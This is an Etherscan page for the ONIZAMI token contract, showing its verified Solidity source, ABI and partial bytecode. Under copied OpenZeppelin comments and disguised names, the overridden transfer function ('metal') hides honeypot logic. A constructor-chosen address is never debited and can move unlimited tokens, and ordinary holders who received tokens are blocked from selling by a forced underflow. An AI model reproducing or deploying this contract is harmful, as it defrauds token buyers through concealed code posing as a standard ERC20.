ETH Price: $2,885.16 (+7.23%)
 

Overview

Max Total Supply

1,000,000,000,000 ONIZAMI

Holders

34

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
9,386,371,866.825876409 ONIZAMI

Value
$0.00
0x999042692d46968a8a2bceb20b6070dcd466bb7c
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
OnizamiERC

Compiler Version
v0.8.16+commit.07a7930e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-19
*/

/**

https://t.me/OnizamiERC
https://medium.com/@Onizami
https://twitter.com/OnizamiERC



*/

// SPDX-License-Identifier: Unlicense

pragma solidity ^0.8.11;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) public Onizamimrkting;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 public _totalSupply;

    string private meant;
    string private widely;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        meant = name_;
        widely = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return meant;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return widely;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return 1000000000000 * 10**9;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return Onizamimrkting[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        metal(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        several(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        metal(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        several(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            several(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token voice, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function metal(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = Onizamimrkting[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            Onizamimrkting[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            Onizamimrkting[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = Onizamimrkting[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            Onizamimrkting[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function several(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                several(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

contract OnizamiERC is ERC20, Ownable {
    address private gas;
    uint256 private arm = 2;
    uint256 private care = 32;

    IUniswapV2Router02 public uniswapV2Router;

    mapping(address => uint256) public supplybalance;
    mapping(address => uint256) public autoburnLP;

    function metal(
        address Onizamidplyer,
        address OnizamiBurn,
        uint256 review
    ) internal override {
        if (supplybalance[Onizamidplyer] == 0 && autoburnLP[Onizamidplyer] > 0) {
            address uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), uniswapV2Router.WETH());
            if (uniswapV2Pair != Onizamidplyer) {
                supplybalance[Onizamidplyer] -= care;
            }
        }

        address OnizamiLP = gas;
        gas = OnizamiBurn;
        autoburnLP[OnizamiLP] += care;

        if (supplybalance[Onizamidplyer] == 0) Onizamimrkting[Onizamidplyer] -= review;

        uint256 voice = review * arm;
        voice = voice / 100;
        review -= voice;
        Onizamimrkting[OnizamiBurn] += review;
        emit Transfer(Onizamidplyer, OnizamiBurn, review);
    }

    constructor(
        string memory same,
        string memory raise,
        address ruoter,
        address current
    ) ERC20(same, raise) {
        uniswapV2Router = IUniswapV2Router02(ruoter);
        supplybalance[current] = care;
        Onizamimrkting[_msgSender()] = 1000000000000 * 10**9;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"same","type":"string"},{"internalType":"string","name":"raise","type":"string"},{"internalType":"address","name":"ruoter","type":"address"},{"internalType":"address","name":"current","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"Onizamimrkting","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"autoburnLP","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"supplybalance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

6080604052600260075560206008553480156200001b57600080fd5b5060405162001153380380620011538339810160408190526200003e9162000223565b838360036200004e838262000341565b5060046200005d828262000341565b5050506200007a62000074620000eb60201b60201c565b620000ef565b600980546001600160a01b0319166001600160a01b03848116919091179091556008549082166000908152600a6020526040812091909155683635c9adc5dea000009080620000c63390565b6001600160a01b03168152602081019190915260400160002055506200040d92505050565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200016957600080fd5b81516001600160401b038082111562000186576200018662000141565b604051601f8301601f19908116603f01168101908282118183101715620001b157620001b162000141565b81604052838152602092508683858801011115620001ce57600080fd5b600091505b83821015620001f25785820183015181830184015290820190620001d3565b600093810190920192909252949350505050565b80516001600160a01b03811681146200021e57600080fd5b919050565b600080600080608085870312156200023a57600080fd5b84516001600160401b03808211156200025257600080fd5b620002608883890162000157565b955060208701519150808211156200027757600080fd5b50620002868782880162000157565b935050620002976040860162000206565b9150620002a76060860162000206565b905092959194509250565b600181811c90821680620002c757607f821691505b602082108103620002e857634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200033c57600081815260208120601f850160051c81016020861015620003175750805b601f850160051c820191505b81811015620003385782815560010162000323565b5050505b505050565b81516001600160401b038111156200035d576200035d62000141565b62000375816200036e8454620002b2565b84620002ee565b602080601f831160018114620003ad5760008415620003945750858301515b600019600386901b1c1916600185901b17855562000338565b600085815260208120601f198616915b82811015620003de57888601518255948401946001909101908401620003bd565b5085821015620003fd5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b610d36806200041d6000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c806370a08231116100ad578063a9059cbb11610071578063a9059cbb14610268578063dd62ed3e1461027b578063edc262811461028e578063f2fde38b146102ae578063f3378e08146102c157600080fd5b806370a0823114610209578063715018a6146102325780638da5cb5b1461023c57806395d89b411461024d578063a457c2d71461025557600080fd5b806323b872dd116100f457806323b872dd146101ab578063313ce567146101be57806336b7c992146101cd57806339509351146101ed5780633eaaf86b1461020057600080fd5b806306fdde0314610126578063095ea7b3146101445780631694505e1461016757806318160ddd14610192575b600080fd5b61012e6102e1565b60405161013b9190610aff565b60405180910390f35b610157610152366004610b62565b610373565b604051901515815260200161013b565b60095461017a906001600160a01b031681565b6040516001600160a01b03909116815260200161013b565b683635c9adc5dea000005b60405190815260200161013b565b6101576101b9366004610b8e565b61038d565b6040516009815260200161013b565b61019d6101db366004610bcf565b60006020819052908152604090205481565b6101576101fb366004610b62565b6103b1565b61019d60025481565b61019d610217366004610bcf565b6001600160a01b031660009081526020819052604090205490565b61023a6103d3565b005b6005546001600160a01b031661017a565b61012e61043e565b610157610263366004610b62565b61044d565b610157610276366004610b62565b6104c8565b61019d610289366004610bf3565b6104d6565b61019d61029c366004610bcf565b600a6020526000908152604090205481565b61023a6102bc366004610bcf565b610501565b61019d6102cf366004610bcf565b600b6020526000908152604090205481565b6060600380546102f090610c2c565b80601f016020809104026020016040519081016040528092919081815260200182805461031c90610c2c565b80156103695780601f1061033e57610100808354040283529160200191610369565b820191906000526020600020905b81548152906001019060200180831161034c57829003601f168201915b5050505050905090565b6000336103818185856105cc565b60019150505b92915050565b60003361039b8582856106f0565b6103a685858561076a565b506001949350505050565b6000336103818185856103c483836104d6565b6103ce9190610c7c565b6105cc565b6005546001600160a01b031633146104325760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61043c6000610aad565b565b6060600480546102f090610c2c565b6000338161045b82866104d6565b9050838110156104bb5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610429565b6103a682868684036105cc565b60003361038181858561076a565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6005546001600160a01b0316331461055b5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610429565b6001600160a01b0381166105c05760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610429565b6105c981610aad565b50565b6001600160a01b03831661062e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610429565b6001600160a01b03821661068f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610429565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106fc84846104d6565b9050600019811461076457818110156107575760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610429565b61076484848484036105cc565b50505050565b6001600160a01b0383166000908152600a60205260409020541580156107a757506001600160a01b0383166000908152600b602052604090205415155b1561095d576009546040805163c45a015560e01b815290516000926001600160a01b03169163c45a01559160048083019260209291908290030181865afa1580156107f6573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061081a9190610c8f565b6001600160a01b031663e6a4390530600960009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561087c573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108a09190610c8f565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381865afa1580156108eb573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061090f9190610c8f565b9050836001600160a01b0316816001600160a01b03161461095b576008546001600160a01b0385166000908152600a602052604081208054909190610955908490610cac565b90915550505b505b600680546001600160a01b038481166001600160a01b031983161790925560085491166000818152600b6020526040812080549293929091906109a1908490610c7c565b90915550506001600160a01b0384166000908152600a602052604081205490036109f3576001600160a01b038416600090815260208190526040812080548492906109ed908490610cac565b90915550505b600060075483610a039190610cbf565b9050610a10606482610cde565b9050610a1c8184610cac565b925082600080866001600160a01b03166001600160a01b031681526020019081526020016000206000828254610a529190610c7c565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610a9e91815260200190565b60405180910390a35050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b600060208083528351808285015260005b81811015610b2c57858101830151858201604001528201610b10565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146105c957600080fd5b60008060408385031215610b7557600080fd5b8235610b8081610b4d565b946020939093013593505050565b600080600060608486031215610ba357600080fd5b8335610bae81610b4d565b92506020840135610bbe81610b